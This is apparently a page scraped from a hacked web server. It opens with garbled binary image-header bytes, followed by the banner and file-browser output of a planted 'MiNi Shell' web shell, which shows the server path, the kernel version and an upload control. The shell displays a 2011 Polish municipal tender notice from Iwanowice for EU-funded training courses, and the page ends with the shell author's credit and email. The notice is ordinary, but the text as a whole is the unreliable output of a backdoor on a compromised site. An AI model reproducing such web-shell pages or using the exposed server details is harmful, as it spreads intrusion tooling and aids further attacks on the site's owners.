JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110518/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110518/118386-N-2011.html

<p class="kh_header"><b>Iwanowice: Organizacja i przeprowadzenie kursów i warsztatów dla Gminnego Ośrodka Pomocy Społecznej w Iwanowicach etap II w ramach projektu pt: Czas na zmiany. Program aktywizacji społeczno-zawodowej w Gminie Iwanowice</b><br>
<b>Numer ogłoszenia: 118386 - 2011; data zamieszczenia: 18.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Iwanowice , Iwanowice Włościańskie 99, 32-095 Iwanowice, woj. małopolskie, tel. 012 3884003, faks 012 3884030.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.iwanowice.malopolska.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie kursów i warsztatów dla Gminnego Ośrodka Pomocy Społecznej w Iwanowicach etap II w ramach projektu pt: Czas na zmiany. Program aktywizacji społeczno-zawodowej w Gminie Iwanowice.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> PROGRAM OPERACYJNY - KAPITAŁ LUDZKI - AKTYWNA INTERGRACJA 
Tytuł projektu - Czas na zmiany. Program aktywizacji społeczno-zawodowej w Gminie Iwanowice
Priorytet VII. Promocja integracji społecznej 
Działanie 7.1. Rozwój i upowszechnianie aktywnej integracji  
Poddziałenie 7.1.1. Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej. 
Projekt jest współfinansowany ze środków Europejskiego Funduszu Społecznego. 
	Projekt obejmuje lata 2010-2012 r. realizowany dla 49 uczestników ogółem. 
W każdym roku (grupa docelowa) Uczestnikami Projektu są osoby zagrożone wykluczeniem społecznym, zameldowane/zamieszkujące w Gminie Iwanowice, które jednocześnie są osobami w wieku aktywności zawodowej i korzystają ze świadczeń pomocy społecznej - osoby bezrobotne, nieaktywne zawodowo, otoczenie osób wykluczonych społecznie. 

Przedmiot zamówienia realizowany będzie ściśle w ZADANIACH z podziałem na etapy w latach 2010-2012. 

	1. W 2011 r. zaplanowano ETAP II, który składa się z następujących ZADAŃ:

1)	ZADANIE I - KONSULTACJE Z PSYCHOLOGIEM - indywidualne formy wsparcia psychologicznego - dla 19 osób (Uczestników Projektu) w II i III kwartale 2011 r. Dwie indywidualne konsultacje z psychologiem po 1 godzinie zegarowej dla 19 osób, łącznie 38 godzin zegarowych.
	Wykonawca w celu wykonania usługi zobowiązany jest we własnym zakresie i na własny koszt wynająć lokal na terenie gminy Iwanowice, w odległości do 2 km od siedziby Zamawiającego.

2)	ZADANIE II - TRENING KOMPETENCJI I UMIEJĘTNOŚCI SPOŁECZNYCH - dla 19 osób (Uczestników Projektu) w ilości 30 godzin zegarowych. Dwie grupy po 9 i 10 osób, 15 godzin na grupę (3 dni x 5 godz.). Termin II i III kwartał 2011 r. Forma stacjonarna. Założenia treningu: podniesienie kompetencji życiowych i umiejętności umożliwiających powrót do życia społecznego w tym powrót na rynek pracy i aktywizację zawodową. Trening w zakresie: komunikacji, autoprezentacji, kultury osobistej, finanse domowe, sprawy w urzędzie, zarządzanie czasem, stres, asertywność.
	Wykonawca w celu wykonania usługi zobowiązany jest do wyposażenia uczestników w materiały szkoleniowe oraz publikacje dot. tematu zajęć (książka - poradnik dot. komunikacji, tematyki zajęć dla każdego Uczestnika Projektu). Szczegółowa tematyka zajęć zostanie ustalona z Zamawiającym.
	Zamawiający zapewni lokal na terenie gminy Iwanowice.

3)	ZADANIE III - WARSZTATY Z DORADCĄ ZAWODOWYM - usługi wspierające - dla 19 osób (Uczestników Projektu) w ilości 30 godzin zegarowych.  Dwie grupy po 9 i 10 osób, 15 godzin na grupę (3 dni x 5 godz.). Termin II i III kwartał 2011 r. Forma stacjonarna.
Założenia warsztatów: rozwijanie umiejętności zarządzania własną karierą, metody aktywnego poszukiwania pracy, sporządzanie dokumentów aplikacyjnych, rozmowa kwalifikacyjna, autoprezentacja, w tym indywidualne poradnictwo zawodowe (analiza SWOT).
	Wykonawca w celu wykonania usługi zobowiązany jest do wyposażenia uczestników w materiały szkoleniowe oraz publikacje dot. tematu zajęć (książka - poradnik dot. tematyki zajęć dla każdego Uczestnika Projektu). Szczegółowa tematyka zajęć zostanie ustalona z Zamawiającym.
	Zamawiający zapewni lokal na terenie gminy Iwanowice.

4)	ZADANIE IV BADANIA PROFILAKTYCZNE - badania profilaktyczne lub specjalistyczne w związku z możliwością podjęcia zatrudnienia - dla 19 osób (Uczestników Projektu).  Założenia: pakiet podstawowych badań - ogólne badania lekarskie, badania analityczne: morfologia, mocz, glukoza, lipidogram, hormony tarczycy, EKG, rentgen klatki piersiowej, cytologia. Termin II, III kwartał 2011 r. Forma stacjonarna. 
	Wykonawca w celu wykonania usługi zobowiązany jest we własnym zakresie i na własny koszt wynająć lokal na terenie gminy Iwanowice do przeprowadzenia w/w badań. 



5)	ZADANIE V - KURS PRAWA JAZDY KAT. B - dla 10 osób (Uczestników Projektu) w ilości 30 godzin teoretycznych, 30 godzin praktycznych. Termin II, III, IV kwartał 2011 r. 
	Wykonawca w celu wykonania usługi zobowiązany jest we własnym zakresie i na własny koszt wynająć lokal na terenie gminy Iwanowice, w odległości do 2 km od siedziby Zamawiającego. W cenie oferty należy uwzględnić badania lekarskie oraz opłatę za 1 egzamin państwowy teoretyczny i 1 egzamin państwowy praktyczny przypadający na 1 osobę.
	Zamawiający przewiduje wykupienie uzupełniających godzin praktycznych w ilości 10 godz. na osobę, łącznie 100 godz.  

6)	ZADANIE VI - KURS Z PODSTAW  OBSŁUGI KOMPUTERA - dla 6 osób (Uczestników Projektu) w ilości 20 godzin zegarowych (5 dni x 4 godz.). Termin II, III kwartał 2011 r. Forma stacjonarna. 
Wykonawca w celu wykonania usługi zobowiązany jest do wyposażenia uczestników w materiały szkoleniowe oraz publikacje dot. elementarnych podstaw z obsługi komputera (książka - poradnik dla każdego Uczestnika Projektu). Wykonawca zapewni również catering dla 6 osób (Uczestników Projektu) w terminie i w miejscu realizacji kursu w postaci suszu konferencyjnego (kawa, herbata, woda mineralna gazowana i niegazowana, 2 rodzaje soków, 3 rodzaje ciastek).
Zamawiający zapewni lokal - salę komputerową na terenie gminy Iwanowice.  
7)	ZADANIE VII - KURS NA OPERATORA WÓZKA WIDŁOWEGO - dla 5 osób (Uczestników Projektu). Termin II, III kwartał 2011 r. 
Wykonawca w celu wykonania usługi zobowiązany jest we własnym zakresie i na własny koszt wynająć lokal na terenie miasta Krakowa. W cenie oferty należy uwzględnić opłatę za 1 egzamin przed komisją Urzędu Dozoru Technicznego przypadającą na 1 osobę.
     Wykonawca we własnym zakresie opłaci uczestnikom kursu konieczne badania lekarskie z zakresu medycyny pracy. Celem kursu jest uzyskanie przez uczestników kursu uprawnień operatora wózków jezdniowych podnośnikowych wszystkich typów z napędem spalinowym, akumulatorowym, na gaz propan-butan LPG. 
8)	ZADANIE VIII - KURS FLORYSTA - BUKIECIARZ - dla 7 osób (Uczestników Projektu) w ilości 60 godzin zegarowych. Termin II, III kwartał 2011 r. 
	Wykonawca w celu wykonania usługi zobowiązany jest we własnym zakresie i na własny koszt wynająć lokal na terenie gminy Iwanowice, w odległości do 2 km od siedziby Zamawiającego. W cenie usługi należy uwzględnić wszystkie niezbędne materiały szkoleniowe niezbędne do przeprowadzenia kursu. 
	Zamawiający przewiduje wykupienie uzupełniających godzin praktycznych w ilości 10 godz. 

9)	ZADANIE IX  - KURS MAŁA GASTRONOMIA - dla 2 osób (Uczestników Projektu) w ilości 60 godzin zegarowych. Termin II, III kwartał 2011 r.
	W cenie usługi należy uwzględnić wszystkie niezbędne materiały szkoleniowe niezbędne do przeprowadzenia kursu. Wykonawca w celu wykonania usługi zobowiązany jest we własnym zakresie i na własny koszt wynająć lokal na terenie miasta Krakowa..
	Zamawiający przewiduje wykupienie uzupełniających godzin praktycznych w ilości 10 godz. 


10)	ZADANIE X - KURS PROFESJONALNY SPRZEDAWCA Z OBSŁUGĄ KAS FISKALNYCH - dla 4 osób (Uczestników Projektu) w ilości 60 godzin zegarowych. Termin II, III kwartał 2011 r.
W cenie usługi należy uwzględnić wszystkie niezbędne materiały szkoleniowe niezbędne do przeprowadzenia kursu. Wykonawca w celu wykonania usługi zobowiązany jest we własnym zakresie i na własny koszt wynająć lokal na terenie miasta Krakowa.
11)	ZADANIE XI - KURS PODSTAWOWY SPAWANIA W OSŁONIE CO2 I ARGONU - dla 1 osoby (Uczestnika Projektu). Termin II, III kwartał 2011 r.
Wykonawca w celu wykonania usługi zobowiązany jest we własnym zakresie i na własny koszt wynająć lokal na terenie miasta Krakowa. W cenie usługi należy uwzględnić wszystkie niezbędne materiały szkoleniowe niezbędne do przeprowadzenia kursu. 
12)	ZADANIE XII - CATERING - dla 19 osób (Uczestników Projektu) przez 12 dni (grupa 10 osobowa przez 6 dni oraz grupa 9 osobowa przez 6 dni) - gorący posiłek (jedno danie obiadowe), susz konferencyjny (kawa, herbata, woda mineralna gazowana i niegazowana, 2 rodzaje soków, 3 rodzaje ciastek) na okres warsztatów i treningu kompetencji. Termin II, III kwartał 2011 r. 
Usługa cateringu będzie realizowana w terminie i na miejscu realizacji usług: trening kompetencji i umiejętności społecznych oraz warsztaty z doradcą zawodowym..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówienia uzupełniającego na podstawie art. 67 ust. 1 pkt 6 ustawy PZP dla:
1)	ZADANIA V - Zamawiający przewiduje wykupienie uzupełniających godzin praktycznych w ilości 10 godz. na osobę, łącznie 100 godz.  
2)	ZADANIA VIII - Zamawiający przewiduje wykupienie uzupełniających godzin praktycznych w ilości 10 godz.
3)	ZADANIA IX - Zamawiający przewiduje wykupienie uzupełniających godzin praktycznych w ilości 10 godz.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 85.12.12.70-6, 85.30.00.00-2, 80.53.00.00-8, 80.51.00.00-2, 39.22.20.00-4, 80.53.31.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 12.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 5.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. W celu potwierdzenia tego warunku Wykonawca złoży stosowne oświadczenie. Wzór oświadczenia stanowi załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. W celu potwierdzenia tego warunku Wykonawca złoży stosowne oświadczenie. Wzór oświadczenia stanowi załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. W celu potwierdzenia tego warunku Wykonawca złoży stosowne oświadczenie. Wzór oświadczenia stanowi załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. W celu potwierdzenia tego warunku Wykonawca złoży stosowne oświadczenie. Wzór oświadczenia stanowi załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. W celu potwierdzenia tego warunku Wykonawca złoży stosowne oświadczenie. Wzór oświadczenia stanowi załącznik nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Wypełniony i podpisany Formularz ofertowy z wykorzystaniem wzoru - (Załącznik nr 1 do SIWZ)
2)	Pełnomocnictwa osób podpisujących ofertę do podejmowania zobowiązań                       w imieniu Wykonawcy składającego ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający dopuszcza możliwość zmian do umowy w tym przedłużenia terminu realizacji zamówienia tylko w przypadku wystąpienia okoliczności, które nie wynikają z winy Wykonawcy.
2.	Zmiany treści i warunków umowy mogą nastąpić również w przypadku wystąpienia:
1)	wady lub zmiany w przedmiocie programu realizacji o czas niezbędny dla dostosowania się wykonawcy do takiej zmiany,
2)	zawieszenia przez Zamawiającego wykonywania usługi,
3)	zmian w przedmiocie programu  w wyniku zmian przepisów prawa,
4)	rezygnacji z części usługi przez Zamawiającego/ wprowadzenie usług zamiennych, jeżeli będzie to niezbędne dla prawidłowej realizacji przedmiotu umowy,
3.	Wszelkie zmiany do umowy muszą być dokonane w formie pisemnych aneksów podpisanych przez Strony, pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.iwanowice.malopolska.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminy Ośrodek Pomocy Społecznej w Iwanowicach, Iwanowice Włościańskie 99, 32-095 Iwanowice - pok. nr 2 (obok banku).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.05.2011 godzina 12:00, miejsce: Urząd Gminy Iwanowice, Iwanowice Włościańskie 99 - pok. nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> PROGRAM OPERACYJNY - KAPITAŁ LUDZKI - AKTYWNA INTERGRACJA 
Tytuł projektu - Czas na zmiany. Program aktywizacji społeczno-zawodowej w Gminie Iwanowice 
Priorytet VII. Promocja integracji społecznej 
Działanie 7.1. Rozwój i upowszechnianie aktywnej integracji  
Poddziałenie 7.1.1. Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej. 
Projekt jest współfinansowany ze środków Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com